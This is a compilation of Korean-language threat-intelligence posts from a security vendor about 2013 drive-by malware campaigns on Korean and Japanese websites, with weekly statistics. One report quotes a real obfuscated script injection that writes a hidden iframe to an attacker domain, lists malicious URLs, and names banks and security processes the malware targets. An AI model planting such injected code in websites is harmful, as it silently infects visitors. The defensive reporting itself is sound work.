게다가, YTN 웹사이트에서만 발생한 것이 아니라 인벤, 한경닷컴 등 국내에서 사용자의 방문이 많은 사이트에서도 동일한 공격이 확인되었으며, 일부 사이트에 대한 공격은 5월 20일까지 지속적으로 발생했다.

인벤: www.inven.co.kr/common/*/*.js

한경: www.hankyung.com/news/*/*.html

 

제로데이 취약점을 활용한 공격을 해외와 국내로 나눠서 비교 분석하면 다음과 같다.

 

1. 대상: 해외에서는 특정한 사용자를 대상으로 하는 공격인 반면에, 국내에서는 방문자 수가 많은 일반적인 웹사이트를 대상으로 한 공격으로 목적이 전혀 다르다고 추정할 수 있다. 국내에서는 대부분 게임 사용자를 노린 공격이 다수를 차지하였다.

 

2. 출현 시기: 해외에서는 제로데이 취약점과 관련된 보안패치가 나오기 훨씬 이 전에 발생하였다. 앞에서 언급한 바와 같이 특정한 사용자를 대상으로 한 공격으로 꽤 높은 공격성공율을 보였을 가능성이 높다. 국내에서는 보안 패치가 발표된 이후에 공격이 출현하였기 때문에 공격 성공률은 높지 않았을 가능성이 많지만, 오히려 방문자 수가 상대적으로 많기 때문에 실제적인 공격이 성공한 사례를 훨씬 많았을 것으로 추정된다.

 

다행이도 5월 15일에 발표된 MS 월간 보안 업데이트에서 이 제로데이 취약점에 대한 보안 패치가 발표된 이후이기 때문에 보안 패치를 한 사용자들은 별 문제가 없었을 수도 있다. 하지만, 실제적으로 보안 패치를 충실히 하지 않은 경우, PC 방과 같이 이미지 복구 방식을 통해 사용하는 PC 등에서는 여전히 보안 취약점이 남아 있을 가능성이 높으므로, Windows Update 등을 이용하여 최신 보안 업데이트를 적용해야 한다.

 

최근에 제로데이 공격은 지난해 말 IE 제로데이(CVE-2012-4792), 올해 초 JAVA 제로데이(CVE-2013-0422), 그리고 지난 5월 18일 IE 제로데이(CVE-2013-1347)까지 모두 3번 발생했다. 대부분의 제로데이 공격은 패치가 없는 경우가 많으며, 실제 다운로드되어 감염되는 악성코드 또한 기존 보안 솔루션인 백신(안티바이러스)에서 진단되지 않도록 우회하는 경우가 대부분으로, 실제 이러한 문제점을 해결하기 위해서는 공격이 처음 유포되는 웹사이트에 대한 모니터링 강화, 그리고 발생시 빠른 대응이 필수적이라고 할 수 있다.

 

참고로, 당사가 탐지 및 분석한 악성코드 유포지 DB를 활용하는 큐브디펜스 장비의 경우 탐지 직후 20분 이내에 차단할 수 있도록 동작하며, 로그를 분석한 결과 동일한 공격 확인 및 차단 여부를 확인할 수 있었다.

 

참고자료

MS 자료: MS13-038 (http://technet.microsoft.com/ko-kr/security/advisory/2847140)

PASTEBIN 자료: http://pastebin.com/ceDiip55

 

Posted by 바다란

 

Bitscan PCDS 주간 동향 브리핑 요약

( Bitscan Pre-Crime Detect Satellite Weekly Trend Briefing Summary )

 

<주간 유포된 도메인 수>


5월 2주차는 전주에 비해 신규 악성링크도 소폭 상승하였으며, 이 악성링크로 인해서 영향을 주는 전체 사이트는 대폭 증가하였다. 또한 탐지를 우회하기 위한 새로운 형태의 파밍이 발견되었다. 4월 4주차부터 금주 차까지도 C 클래스 대역(최대 13개 IP)을 활용하여 악성코드를 활발하게 배포하였으며, 더욱 탐지 회피를 위해 또 다른 클래스 대역을 이용하는 정황이 탐지되었다. 공격자는 일정 시간마다 IP 주소를 변경하고 있으며 전체 대역을 차단하지 않으면 피해는 계속 발생할 것으로 예상된다.










<시간별 통계>

 

금주의 시간 별 통계를 살펴보면, 신규 악성링크의 유포가 월요일, 금요일, 일요일 오후, 저녁에 집중적으로 발생했다는 것을 관찰하였다. 구체적인 시간을 살펴보면, 월요일 16시~19시, 금요일 18시~23시, 일요일 09시~17시와 23시~24시에 가장 많은 유포가 발생하였다. 특히, 매주 발견되는 신규 악성링크의 유포행위는 꾸준히 변경이 되기 때문에 전체 범위를 모니터링하고 사전 탐지하여 조치하는 대책을 고려해야 한다.











<최근 1달 악성링크 도메인 통계>

4월 1주차부터 5월 2주까지의 최근 주요 국가별 악성링크 도메인 통계를 살펴보면, 누적 수는 한국이 171건(34.8%), 미국 168건(34.2%), 중국 4건(0.8%), 홍콩 131건(26.7%), 일본 7건(1.4%), 태국 8건(1.6%), 대만 2건(0.4%) 등으로 나타났다. 특히 홍콩의 비율이 꾸준히 높은 수준을 유지하고 있으며, 이는 홍콩에 위치한 C 클래스 대역을 이용하여 대규모로 악성링크와 최종 악성파일을 변경한 사례가 4월4주부터 금주까지도 계속되기 때문이다.

 










<주간 악성링크 도메인 통계>

국가별 악성링크 도메인 통계를 분석한 결과, 한국이 37건(56.9%), 미국 6건(9.2%), 홍콩 19건(29.2%), 태국 2건(3.1%), 대만 1건(1.5%) 순으로 차지하였다.

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는 info@bitscan.co.kr 로 연락주십시오.

 

감사합니다.

Posted by 바다란

 

Bitscan PCDS 주간 동향 브리핑 요약

( Bitscan Pre-Crime Detect Satellite Weekly Trend Briefing Summary )


 

<주간 유포된 도메인 수>


5월 1주에는 신규 악성링크는 급격히 줄어 든 것으로 관찰되었다. 국내 보안 업체의 탐지 및 추적을 우회하기 위해 다단계(MalwareNet)로 전파하는 사례가 꾸준하고, 특히 기존에 숨겨져 있던 URL을 재사용하는 경우도 발견되었다. 지난 주와 마찬가지로 C 클래스 대역(약 10개의 IP)을 활용하여 악성코드를 활발하게 배포하는 정황도 포착되었다.







<시간별통계>

 

금주의 시간별 통계를 살펴보면, 신규 악성링크의 유포가 화요일, 금요일, 토요일 오전, 오후, 저녁에 집중적으로 발생했다는 것을 관찰되었다. 구체적인 시간을 살펴보면, 화요일 12시~18시, 금요일 06시~12시, 토요일 12시~18시와 18시~24시, 토요일에 12시~24시에 가장 많은 유포가 발생했으며, 일요일은 12시~24시에 집중적인 유포가 발생하였다. 특이한 점은 바로 화요일 오후에 많은 유포행위가 있었다는 점으로 월말에 금융 거래가 많은 것을 노렸을 가능성도 배제할 수 없다

 

<최근 1달 악성링크 도메인 통계>

 

3월 5주차부터 5월 1주까지의 최근 1달 동안의 주요 국가별 악성링크 도메인 통계를 살펴보면, 누적 수는 한국이 133건(26.4%), 미국 199건(39.5%), 중국 11건(2.2%), 홍콩 148건(29.4%), 일본 7건(1.4%) 태국 5건(1.0%) 등으로 나타났다.









<주간 악성링크 도메인 통계>

 

국가별 악성링크 도메인 통계를 분석한 결과, 한국이 30건(33.3%), 미국 16건(17.8%), 홍콩 43건(47.8%), 태국 1건(1.1%) 순으로 차지하였다. 홍콩이 크게 증가한 이유는 (홍콩 소재) C클래스 대역에 이용하여 대규모로 악성링크와 최종 악성파일을 변경한 사례가 포함되었기 때문이다.

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는info@bitscan.co.kr 로 연락

주십시오.

 

감사합니다.

Posted by 바다란

 

Bitscan PCDS 주간 동향 브리핑 요약

( Bitscan Pre-Crime Detect Satellite Weekly Trend Briefing Summary )

 

 

<주간 유포된 도메인 수>

4월 3주는 3월 3주부터 소강상태였던 신규 악성코드 링크가 다시 활발하게 이용되고 있는 것을 볼 수 있으며 국내에서는 공다팩, 레드킷, CK VIP가 관찰되었다. 유포 전략 측면에서 볼 때, 공격자는 기존에는 특정 사이트 및 관련된 계열사까지 동일한 악성링크를 삽입하는 방식을 썼었지만, 이번 주에는 각기 다른 악성링크를 삽입하여 하나가 차단 되더라도 다른 링크를 이용하여 감염율을 높일 수 있도록 다양한 통로를 마련하고 있으며, 이렇게 공격자가 회피하는 전략을 꾸준히 변경하는 추세이다.

<시간별 통계>

 

금주의 시간별 통계를 살펴보면 화요일 오전부터 저녁, 금요일 저녁, 토요일 오전에 집중적으로 신규 악성링크의 유포가 있었던 사실을 확인할 수 있었으며, 화요일에 특이하게 발생 빈도가 증가한 점에 대한 구체적인 원인은 판단이 불가능하였다.

 

 

<최근 1달 악성링크 도메인 통계>

 

3월 3주차부터 4월 3주까지의 주요 국가별 악성링크 도메인 통계를 살펴보면, 누적 수는 한국이 64건(27.7%), 미국이 128건(55.4%), 중국이 18건(7.8%), 홍콩이 10건(4.3%), 일본이 6건(2.6%) 등으로 나타났다. 추이를 살펴보면 이번 주 들어 국내의 비율이 급격하게 증가하고 있다.

<주간 악성링크 도메인 통계>

 

국가별 악성링크 도메인 통계를 분석한 결과, 한국이 23건(41.8%), 미국이 25건(45.5%), 일본이 3건(5.5%), 홍콩이 4건(7.3%) 차지하였다.

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는info@bitscan.co.kr 로 연락

주십시오.

감사합니다.

Posted by 바다란

악성코드 유포 일본을 정조준 -한류, 악성코드를 전파하다.

 

*빛스캔은 2013년 2월. 일본내의 악성코드 유포 상황에 대해 한국인터넷의 범위를 관찰하는 PCDS (Pre Crime Detect Satellite) 관찰 범위를 일부 이동 시켜 관찰 할 예정입니다.

 

 

2004년에 일본에서 방영된 '겨울연가'는 중년 여성들의 폭발적인 인기에 힘입어 주인공인 배용준(욘사마)를 일약 한류 스타로 만들었다. 이후 드라마뿐만 아니라 가요와 같은 문화 컨텐츠가 대만, 베트남 등 아시아에 널리 전파되었고 전세계로 확산 되고 있다. 현재는 보아, 비, 원더걸스와 같은 아이돌 가수를 중심으로 지속적인 해외 진출을 시도하여 일본뿐만 아니라 중국, 동남아시아에서 상당한 인기를 얻고 있다.

최근 씨엔블루(CNBlue)는 일본 오리콘 차트에서 새로운 싱글을 발표하면서 2위(2012년 12월하순)까지 차지하는 인기를 누리고 있는 것으로 알려져 있다.

 

악성코드를 유포하는 공격자들은 한류의 선봉을 맡고 있는 웹사이트도 비켜가지 않는다.

 

지난 2월 5일 16시경, 국내 날씨예보 관련 웹서비스에 JP도메인을 사용하는 악성링크가 추가된 것이 빛스캔의 PCDS에 탐지되었다. 탐지 당시 악성코드를 유포하거나 중계지로 활용되지는 않았지만, 공격자가 로그를 분석할 수 있는 링크를 삽입한 것으로 보아 공격 대상 웹사이트의 방문자 유형을 분석하거나 하는 등의 사전 준비로 보여 졌다. 이틀간의 관찰기간을 거쳐 2월 7일 오전 11시경에 실제 공격을 수행하는 공격링크가 추가된 것이 확인 되었으며, 해당 공격은 국내의 날씨 예보 관련 사이트에서도 공격이 발생됨은 물론 일본 내에서도 해당 서비스를 방문하는 모든 사용자들에게 동시에 공격이 발생 되고 있음이 확인 되었다. 즉 악성코드 유포지 이외에도 경유지로도 활용된 상황이다. ( 해당 서비스는 씨엔블루 그룹의 일본 공식 웹서비스인 cnblue.jp 이다. ) 악성링크는 2월 11일 다시 변경 되었으며, 2월 12일 현재까지도 악성코드 유포는 계속 되고 있다. 즉 2월 7일부터 2월 12일 오전까지 cnblue.jp 사이트를 접근한 사용자들 모두가 공격을 받았으며, Java와 IE 업데이트가 되어 있지 않았다면 좀비 PC가 되었을 것이다. 국내 사이트도 두 곳 정도 cnblue.jp에 올려진 악성링크의 영향을 받아 감염을 시켰기에 국내도 일부 영향이 있었을 것이다. 최종 악성파일의 분석 내용은 국내 은행의 접속 시에 주소를 변환하는 파밍 역할을 하는 악성코드였으며, 원격에서도 통제가 가능하므로 추가적인 위협은 계속 될 것으로 판단된다. 일본 내에 유포된 악성코드는 APT와 같은 추가적 정보 유출의 위협을 가지고 있을 것으로 추정되고 있다.

 

국내 사이트를 공격하여 웹소스 상에 악성링크를 추가하고, 악성링크의 정체를 잘 탐지 되지 않도록 하기 위해 신뢰받는 웹서비스를 추가적으로 해킹하여 악성링크 자체로 이용하는 것은 탐지를 회피하기 위한 목적으로 지난해부터 자주 사용이 되고 있다. 국내의 악성코드 감염 확산에 이용된 악성링크를 조사하는 과정에서 일본 내에서도 광범위한 공격이 발생 혹은 시작 될 수 있는 징후를 발견 하였으며, 어쩌면 이미 시작 되었을지도 모를 것이다.

< 2월 5일 첫 발견 당시의 접속자 관찰 용도의 링크 자동 실행 화면>

 

본 사이트의 경우 언어의 특성상 한국 팬보다는 일본(어를 사용하는) 팬이 많이 접속할 것으로 예상되며, 이를 통해 많은 일본 이용자들이 현재도 악성코드에 감염되고 있을 것으로 추정된다.

< 2월 7일 오전 11시경 실제 공격코드가 동작하여 방문자들에게 감염을 시키고 있는 cnblue.jp 웹서비스>

 

악성링크는 공식 홈페이지 소스코드에 악성링크를 추가하는 형식으로 실행이 되고 있었다. 즉 공격자가 서비스에 대한 모든 권한을 가진 상태와 동일하다.

< 공격자가 인위적으로 소스를 추가하여 모든 방문자들에게 실행 되도록 구성한 내용>

 

해당 공격코드가 이용하는 기법은 현재로서는 한국에서 널리 이용되고 있는 최신 취약점( 제로데이) 과는 조금 다른 방식 이였으며 Java 취약성 두 가지와 MS XML 취약성 하나를 포함한 세 종류의 취약성을 이용하여 방문자 PC를 공격하는 것이 확인 되었다. 공격코드 제작을 위해 사용된 공격자의 생성 도구는 CK VIP Exploit kit으로 분석 되었다.

< cnblue.jp 내의 악성링크의 내용 – 단 하나의 링크 추가로 직접 공격이 발생됨>

 

공격이 성공된 이후에 설치되는 최종 악성파일은 감염 이후 추가적인 공격 파일을 미국의 캘리포니아에서 다운로드를 받아 설치하는 것으로 분석 되었으며, 현재 전 세계 백신을 대상으로 테스트 할 수 있는 Virus Total에서 확인해본 결과 지금껏 보고 되지 않은 악성파일이였다.

< 최종 악성파일인 sms.exe 파일에 대한 VirusTotal 비교 결과 – 미 보고된 신종 악성파일>

< 최종 악성파일이 방문자 PC 설치 이후 추가 공격 코드 다운로드 기록 >

 

공격이 성공된 이후 설치되는 악성파일은 공격자가 올려둔 또 다른 파일들을 다운로드 시도하고 시스템에 설치하는 행위를 하였고, 악성파일을 다운로드 받는 주소는 174.139.68.xx 이였다. 해당 IP는 미국 캘리포니아 오렌지 카운티에 위치한 것으로 확인 되고 있다.

< 추가 공격파일 다운로드 위치>

 

2월 5일 관찰 현상의 최초 발견부터 2월7일 실제 공격이 발생된 시점까지의 관찰기록을 보면 공격자들은 국제적인 네트워크를 자유자재로 활용 하고 있음을 알 수 있다. 악성코드 감염을 위해 유명 웹서비스들을 이용하는 것을 확인 할 수 있으며, 지금껏 국내에서만 활발하게 발견이 되고 해외에서는 드물게 발견 되는 유형이었던 웹 서비스를 통한 대량 감염 (drive by download) 이 이제 일본에도 직접적으로 발생 되고 있는 것이 확인 된 것이다. 일본 내에서도 Java와 MS의 패치가 되어 있지 않은 상태에서 해당 웹서비스를 방문하게 되면 공격의 영향을 직접 받을 수 밖에 없으며, 단지 방문만 하여도 악성코드에 감염되고 추가로 미국에 위치한 추가적인 악성코드들을 그 어떤 인지도 없이 받게 될 수 있다. 좀비 PC가 된 이후의 권한은 오직 공격자에게 있을 뿐이다.

 

이번 일본 내에 위치한 도메인을 이용한 악성링크 활용 사례는 지금까지 한국에서 사용되는 공격방식과 유사한 상황을 보이고 있어서, 앞으로 최신 취약점(제로데이)를 활용하여 모든 방문자 PC를 직접 공격할 가능성이 높은 상태이다.

방문자들 대부분이 악성코드의 감염 영향권에 들 수밖에 없다. 아직 일본에서 이러한 공격을 통해 공격자가 얻을 수 있는 수익모델이 널리 알려지지는 않았지만, 안정적인 수익 모델이 생길 경우 한국과 같은 상황으로 돌변할 가능성이 높다. 게임 아이템 탈취와 같은 개인정보 유출은 일상적인 사례가 될 것이고, 현재에도 백신에 탐지가 되지 않는 상태로 PC에 설치가 되고 있는 상황이라 APT와 같은 장기적인 정보유출에도 직접 이용 될 여지가 높다.

 

국내도 마찬가지 이지만 일본 내에서의 좀비 PC 확산을 막기 위한 방안으로는 악성링크로 이용된 경로를 차단하고 추가 공격코드를 다운로드 받는 미국의 주소에 대해서도 차단을 병행해야 대응이 될 수 있다. 근원적으로는 공격자가 자유자재로 통제하는 웹서비스의 보안성을 높여서 추가적인 악성코드 감염 시도가 발생 되지 않도록 해야 할 것이다.

 

국가와 국가를 자유롭게 이동하며 공격을 하는 공격자들은 이제 공개적으로 일본 내에서의 좀비 PC 확대를 위한 대량유포 매커니즘을 작동 하였다. 이미 오래 전부터 시작 되었으나, 감지가 늦은 것일 수도 있다. 분명한 것은 일본의 IT 시스템도 대량 확산되는 악성코드의 습격으로부터 자유롭지 못하며, 이제 시작이라는 것이다.

 

현재 빛스캔㈜은 PCDS (Pre Crime Detect Satellite)를 운영하여, 국내 120만개의 웹 서비스와 해외 10만 여 개의 웹 서비스를 모니터링하며 악성코드 유포에 이용되는 악성링크를 추적하고 있다. 본 이슈를 통해 일본 내의 악성코드 유포에 대해 모니터링을 강화하고 있다. 전세계적으로 공격이 매우 극심한 국내의 상황에서 특화된 기술과 역량을 통해 집중적인 노력을 기울이고 있으며 매주 수요일 한주간의 한국 인터넷 위협현황에 대해 카이스트와 공동으로 정보를 제공 하고 있다. 알려지지 않은 위협에 대해 대응을 하기 위한 기본적인 가이드이다. 문의는 info@bitscan.co.kr로 하면 된다.

Posted by 바다란

빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 6 1주차 국내 인터넷 환경의 위협 분석 내용입니다. 

본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라대규모로 확장 및 개선된 상황을 유지하며 운영 되고 있습니다.

모든 IP 주소와 도메인 명은 가려지며 보고서 서비스의 구독을 하시는 기업 / 기관에는 공개적으로 기술이 됩니다.


 본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

 


1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 각 개별 기술 분석 참고)


 


금주 차의 특징은 공격자들의 전략적인 공격이 대폭 확대 되고 있습니다악성링크에 대해 대규모 변경과 추가가 계속 발생 되고 있습니다신규 악성링크의 수치는 전주와 유사하며 신규 악성코드만 일부 증가된 형태를 보이고 있습니다그러나 실제 악성링크 하나가 전주에 관찰 되었듯이 최소 10 ~ 최대 100 개 이상의 웹서비스에서 동시에 중계된 사례가 발생 하였으며 금주에는 최대 250개 이상의 사이트에서 동일 링크가 중계되는 관찰이래 최대치의 악성링크 확산 사태가 발생 하였습니다. 즉 중간 경로를 이용한 효율적 공격들이 대규모로 관찰 되고 있어서 영향력 면에서는 지난주의 100여개 이상의 사이트에서 유포된 사례와 비교하여 위험성은 더 대규모로 확대된 상태 입니다.



 큰 특징은 다음과 같습니다.



         * 현재 발견 된 것 중에서도 대규모 Malware net 이외에 다수의 Malware net이 운영 중에 있습니다. 규모는 작으나 언제든 대규모 확장이 가능한 상태로 유지됨

  • 몇몇 은행의 인터넷 뱅킹을 특정 사이트로 유도하기 위한 공격의 온라인 전파 ( Drive by download  파일 업데이트가 아닌 웹 서비스 방문을 통한 대규모 유포 시도)

http://www.dailysecu.com/news_view.php?article_id=2363 에서 기사화된 내용과 동일한 내용이나 특정 방송의 업데이트나 일부에 국한된 문제가 아니며 대규모 Malware net을 통해 방문자들 모두에게 대량 유포되는 형태로 유포 되었으며 국내에 매우 많이 확산 되어 있을 것으로 판단 됩니다. )


  • 분석 방해를 위한 Virtual machine 회피 기법 활용  국내 주요 백신에  Killing, 거의 대부분의 게임에 대한 프로세스 모니터링 대규모 발견


  • 백도어  키로거 기능의 악성코드 유포 대폭 증가 - 6.10일 부터 Mass sql 공격의 일종으로 추가된  fjuhgk.com/r.php 링크가 신규 발견 되어 확산 중입니다.


부수적으로 중앙일보에 대한 페이지 변조 사건이 있었습니다만 저희쪽에 감지된 일부 언론사의 경우 실제 악성코드 유포에 직접 활용 되었으며  언론사는 조선일보 입니.  저희쪽에 감지된 악성링크가 추가된 url 은 xxxxxxx.chosun.com/inc/scripts.js 이나 전체적으로 문제가 있었을 것으로 예상 되고 있습니다.  

방문시 실행 되는 악성링크는 50.117.xxx.86/image/img.js 입니다. 시스템 상에 백도어 설치를 통해 게임 계정 정보를 유출 하는 악성코드의 일종이 설치 되었습니다. 1주일 동안 발견된 악성코드 흔적 2300여 곳중 하나일 뿐입니다.  중앙일보 페이지 변조 보다 수준 높은 악성코드 유포가 그만큼 많이 일어나고 있는 현재의 모습일 뿐입니다.



 


금주의 악성코드 유포지로 이용된 웹서비스들은 300여곳 이상이며 전주 대비 대폭 감소 되었으나 실제로는 600여곳 이상에서 악성코드를 중계 하였습니다.  전주 대비 감소의 이유에는 250여 곳 이상의 서비스에서 악성코드를 유포한 악성링크가 이미 지난 3월에 발견된 악성링크로서 금주의 신규 악성링크 통계에는 빠져 있어서 통계치의 왜곡이 발생 되었습니다3월에 소규모였던 악성링크 확산 규모가 주말 단 2일 동안에 250여 개 이상의 웹 사이트에서 중계를 하도록 확장 되는 심각한 국면이 전개 되고 있습니다. 6 1주차의 전체 악성링크 흔적이 발견된 곳은 2300여 곳입니다.

 


현재도 매우 활발하게 범위를 확산 시키고 있고 단 이틀 만에 250개 이상의 취약한 웹서비스들에 악성링크를 추가하는 적극적인 공격이 계속 확산 되고 있습니다. 악성링크가 삽입된 웹서비스들

의 대응이 많이 부족한 상태라 계속 재발 되고 있으며, 대규모 감염을 시키기 위해 사용자가 방문 시 감염 될 수 있는 사이트들을 대규모로 확장하여 거대 네트워크를 운영 중입니다. 악성코드 전파용인 Malware net 은 금주의 관찰 결과 지난주 관찰되었던 백여 개 이상의 웹서비스들에서 중계되었던 http://www.xxxxxxxxx.com/script/js/script.js 악성 중계 링크의 경우 이 중 40% 가량이 금주 공격에 이용된 www.xxx.or.kr/popup_img/popup.js  전환되는 현상이 관찰 되었습니다 공격자가 Active 하게 활용   있는 상태라 확인이 되고 있습니다.

 

www.xxx.or.kr/popup_img/popup.js -> 추가된 악성링크 내용

 

if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%30%71%6C%2E%69%6E%66%6F%2F%77%6D%2F%68%75%69%77%65%69%2F%69%6E%64%65%78%2E%68%74%6D%6C%27%20%77%69%64%74%68%3D%27%31%30%30%27%20%68%65%69%67%68%74%3D%27%30%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E"));}

 

Hex  Decode 

-> if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<iframe src='http://0ql.info/wm/huiwei/index.html' width='100' height='0' frameborder='0'></iframe>"));}



<실제 악성링크의 구조도>



정리하면 지난주에 활용 되었던 악성링크가 추가된 Malware net 40% 가량이 금주에 출현한 새로운 악성링크로 전환 되었으며 또한 규모도 전주보다 대폭 증가된 250여 곳 이상에서 관찰 되었습니다.

본 링크에 대한 공개는 대규모 피해 방지를 위해 공개합니다또한 악성링크의 내용은 수시로 변경이 되고 있으며, 1회 변경시 마다 250여개 이상의 웹사이트에서 동시에 방문자 감염이 이루어 지게 되어 있습니다공격자로서는 매우 효율적인 방식이며 차단 및 대응을 하는 측에서는 곤혹스러운 상태라 할 수 있습니다.

 

결론적으로 지금까지 사용 되어진 악성링크들을 반복해서 재활용 하는 형태는 여전 하며, 최종 설치되는 악성코드들도 동일한 유형을 계속 활용 하고 있습니다. 또한 행위 분석 방해를 위한 Virtual Machine 분석 회피 방안도 지속적으로 출현 중입니다한 가지 특이할 만한 사항은 저희쪽의 PCDS ( Pre Crime Detect System)을 회피하기 위해 3월에 이용 되었던 악성링크를 이번 대규모 악성코드 유포에 적극 활용 하였다는 점이며 이미 선 반영이 되어 향후에는 갱신된 실제 현황으로 브리핑이 가능 할 예정입니다.

 

 

악성링크 자체 및 웹서비스 전체적으로 문제점 개선이 이루어 지지 않고, 악성코드 유포 인지도 못하는 상태라서, 대응이 되지 않는 악순환이 계속 되고 있습니다. 이제 공격자들은 자유로운 재활용을 넘어, 악성코드에 감염된 좀비 PC의 대규모 확산을 위해 악성코드 유포지를 대폭 늘리고 직접 활용을 하는 단계로 전환 되었습니다. 또한 대규모 Malware net을 자유자재로 변경하고 활용 하는 현상이 추가 관찰 되어 향후의 위험성은 더욱 높아진 상태입니다.  지금까지의 브리핑에서 언급 하였던 예상과 동일하게 진행이 되고 있으며 지금까지 차단을 권고 드린 IP 대역 대부분을 모두 재활용 하였습니다. 만약 차단을 하셨다면 상당히 많은 좀비 PC 감염 및 APT의 위험을 사전에 예방 하실 수 있으셨습니다.

 

전체적으로 금주 국내 인터넷 서비스를 통한 악성코드 감염 및 좀비 PC 감염 비율은 상당히 높은 상태를 유지한 것으로 판단되며  금융권에 대한 정보유출을 위한 악성코드도  대규모 활동을 함으로써  강도 높은 경계 단계로 진입 합니다.

 

6 1주차 특징은 다음과 같습니다.

 

특징

·  · 다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속

·  · 악성코드 유포지의 대폭 증가 및 대량 유포 현실화 - 향후 지속 될 것임

·  · 악성코드 유포자들의 전략적 행위 증가 및 범위 확대와 재활용 증가

          * 최대 250여 곳의 웹서비스가 동일 악성링크를 유포하는 것에 이용될 정도로 광범위한 증가

·  · 악성코드 분석 자체를 방해하기 위한 가상머신 우회기술, 루트킷(APT 형태) 유포 확대

·  · 3월부터 사용되었던 주요 악성링크 및 악성코드의 대규모 재활용 계속

·   은행 사용자를 겨냥한 Host 파일 변조 기능의 악성코드 유포 (홍콩으로 연결됨 

대규모로 유포된 게임 계정 탈취형 악성코드에 추가된 기능으로서 국내에 상당규모 유포 되었을 것으로 추정됨  Host 파일에 변조된 IP 주소는 123.254.xxx.92 (홍콩)


사이트명

은행명

은 행

www.kbstar.com

국민은행

kbstar.com

obank.kbstar.com

banking.nonghyup.com

농협

www.wooribank.com

우리은행

wooribank.com

pib.wooribank.com

bank.keb.co.kr

외환은행

www.keb.co.kr

 

* 악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.

 

* 유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다. 저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’ 로 정의 하고 있습니다.

 

사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은 주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게 Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다. 또한 루트킷 및 APT 형태의 감염을 위해 사용자 PC에 디바이스 드라이버를 설치한 상태에서 내부 대역 스캔 및 특정 IP로 연결 하는 형태는 한번 감염시 막대한 피해를 감내해야 하는 부분이므로 강력한 보호 방안 수립이 요구 되고 있습니다. 

 

패치 이외에도 다양한 방안을 강구해야 문제 해결 할 수 있으며 현재 모든 보안 솔루션들이 사후 대응에 중점을 맞추고 있는데 가장 중요한 것은 사전에 대응이 얼마나 되고, 발생 가능한 위험을 제거 했느냐가 핵심이 되어야 합니다. 

 


·   Oracle Java 취약성, Adobe Flash 취약성 , MS Medi  IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

 

·   각 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자 PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.

 

·  기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.

 

모니터링 하는 프로세스의 종류는 하기와 같으며 국내의 대부분 백신 이외에도 넥슨의 OTP까지 모니터링을 하고 있습니다. 게임종류는 국내.외 게임사들의 주력 게임들이 모두 해당 되고 있습니다. OTP 관련 프로세스에 대한 후킹이나 모니터링이 된다는 것은 계정 도용 및 탈취를 막기 위한 보호대책을 추가적으로 모색해야 하는 상황으로 보여집니다금융권도 다르지 않습니다.

 ·

프로세스명

프로그램명

백 신

sgbider.exe

vcsvc.exe

vcsvcc.exe

바이러스체이서

NVCAgent.npc

nsvmon.npc

Nsavsvc.npc

NaverAgent.exe

네이버백신

V3LRun.exe

MUpdate2.exe

SgSvc.exe

V3Light.exe

V3LTray.exe

V3LSvc.exe

V3

AYUpdSrv.aye

AYRTSrv.aye

SkyMon.exe

AYServiceNT.aye

AYupdate.aye

AyAgent.aye

알약

PCOTP.exe

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com

한게임

netmarble.net

넷마블

Raycity.exe

레이시티

ff2client.exe

피파 온라인2

pmang.com

피망

df.nexon.com

dnf.exe

던전 앤 파이터

DragonNest.exe

드래곤 네스트

WinBaram.exe

바람의 나라

heroes.exe

마비노기 영웅전

wow.exe

월드 오브 워크래프트

lin.bin

리니지

MapleStory.exe

메이플 스토리

 

 본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다. 

